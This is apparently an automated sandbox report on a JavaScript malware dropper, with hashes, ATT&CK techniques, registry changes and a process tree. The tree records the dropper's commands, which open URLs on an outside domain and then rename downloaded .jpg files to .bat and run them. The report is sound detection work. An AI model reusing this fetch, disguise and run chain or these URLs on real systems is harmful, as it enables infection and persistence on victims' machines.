61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc

Analysis

max time kernel
188s
max time network
196s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
02/12/2022, 19:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
Size

680B
MD5

6736d1f43e6302e8f949f7d16251e9c7
SHA1

6f1ef9345264627e9723443db718f37599a92e12
SHA256

61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc
SHA512

7049bf60704cbf3de01bea502eb1ebfe47109f18af4d48cbe3d8d82599ba62b31d2f76bdaa7e5b9405ae710df9fb66d8502ee3433950a9f539920b75542a6077

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	wscript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\4d5ddd7f-b5f1-4deb-9b34-8a0a28998380.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221202202113.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4860	msedge.exe
4860	msedge.exe
3144	msedge.exe
3144	msedge.exe
1512	msedge.exe
1512	msedge.exe
1512	msedge.exe
3588	identity_helper.exe
3588	identity_helper.exe
5020	msedge.exe
5020	msedge.exe
5020	msedge.exe
5020	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1512	msedge.exe
1512	msedge.exe
1512	msedge.exe
1512	msedge.exe
1512	msedge.exe
1512	msedge.exe
1512	msedge.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1512	msedge.exe
1512	msedge.exe
1512	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1424 wrote to memory of 1816	1424	wscript.exe	80
PID 1424 wrote to memory of 1816	1424	wscript.exe	80
PID 1816 wrote to memory of 3596	1816	cmd.exe	82
PID 1816 wrote to memory of 3596	1816	cmd.exe	82
PID 3596 wrote to memory of 100	3596	msedge.exe	84
PID 3596 wrote to memory of 100	3596	msedge.exe	84
PID 1424 wrote to memory of 796	1424	wscript.exe	85
PID 1424 wrote to memory of 796	1424	wscript.exe	85
PID 796 wrote to memory of 1512	796	cmd.exe	87
PID 796 wrote to memory of 1512	796	cmd.exe	87
PID 1512 wrote to memory of 4660	1512	msedge.exe	88
PID 1512 wrote to memory of 4660	1512	msedge.exe	88
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 1512 wrote to memory of 1600	1512	msedge.exe	91
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92
PID 3596 wrote to memory of 3412	3596	msedge.exe	92

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b https://installationupgrade6.com/0ssdt1/index/b1/?servername=msi
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://installationupgrade6.com/0ssdt1/index/b1/?servername=msi
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdf60146f8,0x7ffdf6014708,0x7ffdf6014718
      4⤵
      PID:100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6415335899028055770,13998620311623771033,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
      4⤵
      PID:3412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,6415335899028055770,13998620311623771033,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b https://installationupgrade6.com/0ssdt1/index/b2/?servername=msi
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://installationupgrade6.com/0ssdt1/index/b2/?servername=msi
    3⤵
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdf60146f8,0x7ffdf6014708,0x7ffdf6014718
      4⤵
      PID:4660
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
      4⤵
      PID:1600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
      4⤵
      PID:2736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
      4⤵
      PID:4488
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
      4⤵
      PID:1988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
      4⤵
      PID:3904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
      4⤵
      PID:4284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
      4⤵
      PID:4292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4064 /prefetch:8
      4⤵
      PID:3384
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1
      4⤵
      PID:4380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3548 /prefetch:8
      4⤵
      PID:1420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:4440
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6309e5460,0x7ff6309e5470,0x7ff6309e5480
        5⤵
        
        PID:1568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3548 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3588
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:1
      4⤵
      PID:4372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4828 /prefetch:8
      4⤵
      PID:2200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1341992403723200081,11937746830028292279,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5744 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rename b1.jpg b1.bat
  2⤵
  PID:3644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rename b2.jpg b2.bat
  2⤵
  PID:2616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c b2.bat
  2⤵
  PID:3488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c b1.bat
  2⤵
  PID:2876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1216

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177

Filesize
471B

MD5
6181e4e33ee379d858217e9e3c32d74f

SHA1
f7ae858f7037e536203cbf1704d2a431b6f5f059

SHA256
14844456416b1ef58fdff151b4cd0968ae95acb524ef369f225bfa0991e08a6f

SHA512
d4196c5178acfdfc1f176bb21166f5974321e0d0550b44330c2a2dabc7b3e56521eaaa10e1cf5731e8eba4d82a7e722b658bad8154cd06afab4e8178e5611eca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177

Filesize
442B

MD5
f91f681585a2fef74f50007f89474609

SHA1
a0622a99da4e6020bca87f2e3490b963eae91854

SHA256
9a2c169d067f1c00ba4d75390fdc209bc1a6dd5b3dfc22293e910994db2503ae

SHA512
69a0aaeada0ed7ceed0781135ea71780114f09a47bb73f0693ef26dec07dd961427bf064a887846a1d46ab24e8f21a69f5b0a3c7e5c70c45ef40dcaa4bdbcb33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
727230d7b0f8df1633bc043529f5c15d

SHA1
5b24d959d4c5dcf8125125dbee37225d6160af18

SHA256
54961bcb62812886877fcd3ad3896891099cc4bddc51ea6f07a606cf5124d998

SHA512
35735f0dadf7ee69bcccd5e9120d6a55db39138eff58acbe4ea8116fb007c54a024028dccd5f25856ffcf33e1f3bdccfd8d0e2527130a16351debb04c27b8df9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
727230d7b0f8df1633bc043529f5c15d

SHA1
5b24d959d4c5dcf8125125dbee37225d6160af18

SHA256
54961bcb62812886877fcd3ad3896891099cc4bddc51ea6f07a606cf5124d998

SHA512
35735f0dadf7ee69bcccd5e9120d6a55db39138eff58acbe4ea8116fb007c54a024028dccd5f25856ffcf33e1f3bdccfd8d0e2527130a16351debb04c27b8df9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7b4b103831d353776ed8bfcc7676f9df

SHA1
40f33a3f791fda49a35224a469cc67b94ca53a23

SHA256
bf59580e4d4a781622abb3d43674dedc8d618d6c6da09e7d85d920cd9cea4e85

SHA512
5cb3360ac602d18425bdb977be3c9ee8bbe815815278a8848488ba9097e849b7d67f993b4795216e0c168cdc9c9260de504cccb305ff808da63762c2209e532f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
ae3f081b892d0c0dcd2c00d375866183

SHA1
cb37524a0395c0655821dcf168bf80090d8c19b5

SHA256
9fd459de916f135ecb90a8273a647685c05b928beb69c51b95c83d3333dfe1ad

SHA512
2367d584dd0fb6a49a9f3defbd0366f72e4009c924ab6608cb36d9de1a887a503939748a15653aa5e0a2bb852b2d4d0c4b6c5f8758fc91aabfd646d81531410a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
768649399d13aa4d9de18da2ae67b562

SHA1
f4f317595346a26bdf66ac7cf4f61aaa0cfeba25

SHA256
b5d3299352ba6a40d4876eb9f1fe3b9f8744390dfd7eac4d212c4deaf420be2d

SHA512
42d37567f706e339ec2de36a5141da1ca172ce7b4d53191286b7e34a3faf2ce6034f552343beaebacc0be196991ed2b136a35a19c78960e4fc33aab2e50aa5ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
ae3f081b892d0c0dcd2c00d375866183

SHA1
cb37524a0395c0655821dcf168bf80090d8c19b5

SHA256
9fd459de916f135ecb90a8273a647685c05b928beb69c51b95c83d3333dfe1ad

SHA512
2367d584dd0fb6a49a9f3defbd0366f72e4009c924ab6608cb36d9de1a887a503939748a15653aa5e0a2bb852b2d4d0c4b6c5f8758fc91aabfd646d81531410a

Download Submit